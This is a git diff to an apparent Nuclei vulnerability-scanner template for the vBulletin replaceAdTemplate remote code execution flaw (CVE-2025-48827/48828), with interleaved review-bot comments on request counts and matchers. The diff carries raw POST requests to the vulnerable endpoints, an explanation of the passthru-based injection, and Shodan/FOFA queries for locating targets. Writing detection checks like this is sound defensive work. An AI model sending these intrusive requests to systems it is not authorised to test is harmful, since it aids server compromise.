diff --git a/http/vulnerabilities/vbulletin/vbulletin-replacead-rce.yaml b/http/vulnerabilities/vbulletin/vbulletin-replacead-rce.yaml
index 4d9ef0b6d5cf..f6ae30ce6746 100644
--- a/http/vulnerabilities/vbulletin/vbulletin-replacead-rce.yaml
+++ b/http/vulnerabilities/vbulletin/vbulletin-replacead-rce.yaml
@@ -2,7 +2,7 @@ id: vbulletin-replacead-rce
 
 info:
   name: vBulletin replaceAdTemplate - Remote Code Execution
-  author: DhiyaneshDK
+  author: DhiyaneshDK, Chocapikk
   severity: critical
   description: |
     vBulletin versions 5.0.0 through 6.0.3 contain a Remote Code Execution (RCE) vulnerability in the ajax/api/ad/replaceAdTemplate endpoint. This flaw arises from improper use of PHP's Reflection API, allowing unauthenticated attackers to invoke protected controller methods. By injecting a crafted conditional that executes arbitrary PHP code via passthru($_POST[]), and triggering it with a second request to ajax/render/ad_, attackers can run arbitrary commands on the server as the webserver user.
@@ -13,8 +13,15 @@ info:
   reference:
     - https://karmainsecurity.com/pocs/vBulletin-replaceAdTemplate-RCE.php
     - https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-48827
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-48828
   classification:
     cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
+    cve-id: CVE-2025-48827, CVE-2025-48828
+    cwe-id: CWE-424
+
   metadata:
     verified: true
     max-request: 1
@@ -22,7 +29,7 @@ info:
     product: vbulletin
     fofa-query: app="vBulletin"
     shodan-query: http.component:"vBulletin"
-  tags: rce,vbulletin,intrusive
+  tags: cve,cve2025,rce,vbulletin,intrusive
 
 variables:
   rand_string: "{{to_lower(rand_base(5))}}"
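Review bot: `max-request: 1` under `metadata` is left as context in this hunk, but the later hunk adds a second `- raw:` request block, so the template now sends two requests per target and this should read `max-request: 2`. The added `cvss-metrics` vector and `cvss-score: 10` agree with each other and with the unauthenticated (PR:N) wording of the description, so those look consistent. One more point of style: the template keeps its `vbulletin-replacead-rce` id and http/vulnerabilities path while gaining `cve`/`cve2025` tags and two `cve-id` values; if the repository's one-template-per-CVE layout is expected to apply here, a short `# covers both CVE-2025-48827 (reflection bypass) and CVE-2025-48828 (template conditional) in one check` comment above `classification:` would explain why it stays a combined template.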
@@ -36,12 +43,23 @@ http:
         Content-Type: application/x-www-form-urlencoded
 
         routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location={{rand_string}}&template=
-
     matchers:
       - type: dsl
         dsl:
-          - contains(content_type,'application/json')
+          - status_code == 200
           - contains_all(body,'string(5)','{{rand_value}}')
+        condition: and
+
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        routestring=ajax/render/ad_{{rand_string}}
+    matchers:
+      - type: dsl
+        dsl:
           - status_code == 200
+          - contains_all(body,'string(5)','{{rand_value}}')
         condition: and
-# digest: 4a0a00473045022039d5fe53f2231bbabadaf62fc548eedf67c6fbffc543aa29a6e96fcd690d9f3d022100a7d55e33136c01b5c3bbbe57691e3cddbc419cba3c4fcf24c313d1e3fe71795b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
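Review bot: Both request blocks now carry identical `matchers` (`status_code == 200` plus `contains_all(body,'string(5)','{{rand_value}}')`), and since they are separate `- raw:` entries each block's matchers are evaluated against its own response, so a vulnerable host will, as far as I can tell, be reported twice — once for the replaceAdTemplate call and again for the ajax/render/ad_ call. If the second request is meant to confirm that the injected template was stored and renders, keep the matchers only on the second block, or place both requests in a single `raw:` list and match on the final response. It would also help maintainers to record the stateful side effect in a comment above the second block, since it is the reason the `intrusive` tag is kept: `# request 1 appears to store a template named ad_{{rand_string}} on the target; request 2 confirms it renders`. The enclosing `http:` block starts outside this hunk.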